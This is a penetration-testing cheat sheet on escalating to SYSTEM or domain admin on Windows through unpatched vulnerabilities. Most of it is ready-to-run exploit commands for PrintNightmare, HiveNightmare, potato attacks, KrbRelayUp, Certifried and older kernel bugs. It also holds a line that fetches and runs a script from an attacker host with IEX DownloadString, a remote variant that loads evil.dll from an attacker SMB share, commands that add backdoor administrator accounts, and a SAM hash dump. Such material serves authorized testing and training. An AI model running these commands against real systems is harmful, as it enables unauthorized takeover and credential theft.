Kernel Exploits & Missing Patches

When service misconfigs and token tricks aren't viable, target the kernel itself. Identify missing patches, match them to known exploits, and get SYSTEM through unpatched vulnerabilities.

Sections Kernel Exploits & Missing Patches

Patch Enumeration

System Information

Pull OS version and installed patches.

powershell
PS C:\> systeminfo

List hotfixes.

powershell
PS C:\> wmic qfe list brief
powershell
PS C:\> Get-HotFix | Sort-Object -Property InstalledOn -Descending | Select-Object HotFixID, InstalledOn, Description

Check specific KBs (useful when verifying if a target vulnerability is patched).

powershell
PS C:\> wmic qfe get HotFixID | findstr /i "KB5005565 KB5004442 KB5003637"

Tip
Compare the OS build number (systeminfo | findstr "OS Version") against Microsoft’s build history. If the build is months old, it’s a good candidate for kernel exploits.

Automated Exploit Suggestion

Windows Exploit Suggester (WES-NG)

The go-to tool for matching systeminfo output against known exploits.

terminal
# On attacker: update the database first
root@localhost:~# python3 wes.py --update
powershell
# On target: save systeminfo output
PS C:\> systeminfo > systeminfo.txt
terminal
# On attacker: run WES-NG against the output
root@localhost:~# python3 wes.py systeminfo.txt

Filter for privilege escalation only.

terminal
root@localhost:~# python3 wes.py systeminfo.txt --impact "Elevation of Privilege"

Filter for exploits with known public exploit code.

terminal
root@localhost:~# python3 wes.py systeminfo.txt --impact "Elevation of Privilege" --exploits-only

Sherlock / Watson (On-Target)

Watson (C#, newer, recommended over Sherlock).

powershell
PS C:\> .\Watson.exe

Sherlock (PowerShell, older but still works).

powershell
PS C:\> . .\Sherlock.ps1
PS C:\> Find-AllVulns

Or load remotely.

powershell
PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/Sherlock.ps1')
PS C:\> Find-AllVulns
Tip
WES-NG runs on your attacker machine (OPSEC-safe). Watson/Sherlock run on the target (faster, but riskier). Use WES-NG by default, Watson if you need quick results on-target.

Notable Kernel Exploits

PrintNightmare (CVE-2021-1675 / CVE-2021-34527)

Remote code execution and local privilege escalation via the Print Spooler service.

Check if Spooler is running.

powershell
PS C:\> sc query spooler
PS C:\> Get-Service spooler

Check if patched.

powershell
PS C:\> Get-HotFix | Where-Object { $_.HotFixID -match "KB5004945|KB5004946|KB5004947|KB5004948|KB5004950|KB5004951|KB5004953|KB5004954|KB5004955|KB5004956|KB5004958|KB5004959" }

Local privilege escalation variant (add a local admin).

powershell
# Using the PowerShell PoC
PS C:\> Import-Module .\CVE-2021-1675.ps1
PS C:\> Invoke-Nightmare -NewUser "hacker" -NewPassword "Password123!" -DriverName "PrinterDriver"

Remote variant (requires SMB share hosting the DLL).

bash shell
# On attacker: host malicious DLL on SMB
root@localhost:~# impacket-smbserver share . -smb2support
terminal
PS C:\> python3 CVE-2021-1675.py <DOMAIN>/<USER>:<PASS>@<TARGET> '\\<ATTACKER_IP>\share\evil.dll'

HiveNightmare / SeriousSAM (CVE-2021-36934)

SAM, SYSTEM, and SECURITY hive files are world-readable due to misconfigured shadow copy ACLs. Windows 10 versions 1809 through 21H1.

Check if vulnerable.

powershell
PS C:\> icacls C:\Windows\System32\config\SAM

If BUILTIN\Users has read access, it’s vulnerable.

powershell
# Copy from shadow copies
PS C:\> .\HiveNightmare.exe

This creates SAM-haxx, SYSTEM-haxx, SECURITY-haxx in the current directory.

bash shell
# Extract hashes on attacker
root@localhost:~# impacket-secretsdump -sam SAM-haxx -system SYSTEM-haxx -security SECURITY-haxx LOCAL

EfsPotato (CVE-2021-36942 + Named Pipe Impersonation)

Combines EFS coercion with local named pipe impersonation. Works on many unpatched systems.

powershell
PS C:\> .\EfsPotato.exe "cmd /c net localgroup Administrators <USER> /add"
Tip
EfsPotato is integrated into SweetPotato. If SweetPotato is available, it can use this technique automatically.

PetitPotam Local (CVE-2021-36942)

Local variant of PetitPotam for privilege escalation on the same machine.

powershell
PS C:\> .\PetitPotamLocal.exe cmd.exe

KrbRelayUp

Combines Kerberos relay with RBCD or Shadow Credentials for local privilege escalation in domain-joined machines. No admin access needed, just a domain user. [Requires domain-joined machine]

RBCD method.

powershell
PS C:\> .\KrbRelayUp.exe relay -m rbcd -cls {752073A1-23F2-4396-85F0-8FDB879ED0ED}
PS C:\> .\KrbRelayUp.exe spawn -m rbcd -d <DOMAIN_FQDN> -dc <DC_IP> -s <SPN>

Shadow Credentials method (requires AD CS in the environment).

powershell
PS C:\> .\KrbRelayUp.exe relay -m shadowcred -cls {752073A1-23F2-4396-85F0-8FDB879ED0ED}
PS C:\> .\KrbRelayUp.exe spawn -m shadowcred -d <DOMAIN_FQDN> -dc <DC_IP>
Tip
KrbRelayUp is one of the most reliable modern local privesc techniques on domain-joined machines. It works even when potato attacks are blocked.

Certifried (CVE-2022-26923)

Escalate to DA by abusing machine account certificate enrollment. Create a machine account with the same dnsHostName as a DC, request a cert, and authenticate as the DC.

bash shell
# Create machine account with DC's dnsHostName
root@localhost:~# certipy account create -u <USER>@<DOMAIN_FQDN> -p <PASS> -user 'YOURPC$' -pass 'FakePass!' -dns <DC_FQDN> -dc-ip <DC_IP>

# Request cert (will be issued for the DC)
certipy req -u 'YOURPC$'@<DOMAIN_FQDN> -p 'FakePass!' -dc-ip <DC_IP> -ca <CA_NAME> -template Machine

# Auth as the DC
certipy auth -pfx dc.pfx -dc-ip <DC_IP>

LocalPotato (CVE-2023-21746)

NTLM local relay. Allows reading/writing arbitrary files as SYSTEM without needing SeImpersonatePrivilege.

powershell
PS C:\> .\LocalPotato.exe -i payload.dll -o C:\Windows\System32\target.dll
Tip
LocalPotato doesn’t need SeImpersonatePrivilege, making it unique among potato-style attacks. It works by relaying NTLM auth locally from one protocol to another.

CoercedPotato

Combines multiple coercion methods for token impersonation. Works on recent Windows versions. [Requires SeImpersonatePrivilege]

powershell
PS C:\> .\CoercedPotato.exe -cmd "cmd /c whoami"
PS C:\> .\CoercedPotato.exe -cmd "cmd /c net localgroup Administrators <USER> /add"

Older (But Still Relevant) Kernel Exploits

These target legacy systems you’ll encounter in CTFs and older environments.

MS16-032 (Secondary Logon Handle)

Windows 7/8/10, Server 2008/2012 (pre-March 2016 patches).

powershell
PS C:\> Import-Module .\MS16-032.ps1
PS C:\> Invoke-MS16-032

MS15-051 (Win32k.sys)

Windows 7/8, Server 2008/2012.

powershell
PS C:\> .\ms15-051x64.exe "cmd /c net localgroup Administrators <USER> /add"

MS14-058 (Win32k.sys TrackPopupMenu)

Windows 7/8, Server 2008/2012.

powershell
PS C:\> .\ms14-058.exe

MS11-046 (AFD.sys)

Windows XP/7, Server 2003/2008.

powershell
PS C:\> .\ms11-046.exe
Tip
For CTFs, always check the exact OS version and build number first. Most challenge boxes are intentionally missing specific patches. Match the version to the exploit, don’t spray and pray.

Exploit Compilation Tips

Cross-Compile on Linux (for Windows targets)

C exploits.

bash shell
root@localhost:~# x86_64-w64-mingw32-gcc exploit.c -o exploit.exe

32-bit.

bash shell
root@localhost:~# i686-w64-mingw32-gcc exploit.c -o exploit.exe

C++ exploits.

bash shell
root@localhost:~# x86_64-w64-mingw32-g++ exploit.cpp -o exploit.exe -static

Pre-Compiled Exploit Repositories

Instead of compiling, grab pre-compiled binaries from trusted repos.

https://github.com/SecWiki/windows-kernel-exploits https://github.com/abatchy17/WindowsExploits

Tip
Always verify pre-compiled binaries. When possible, compile from source yourself. Never run untrusted binaries from random GitHub repos on client infrastructure.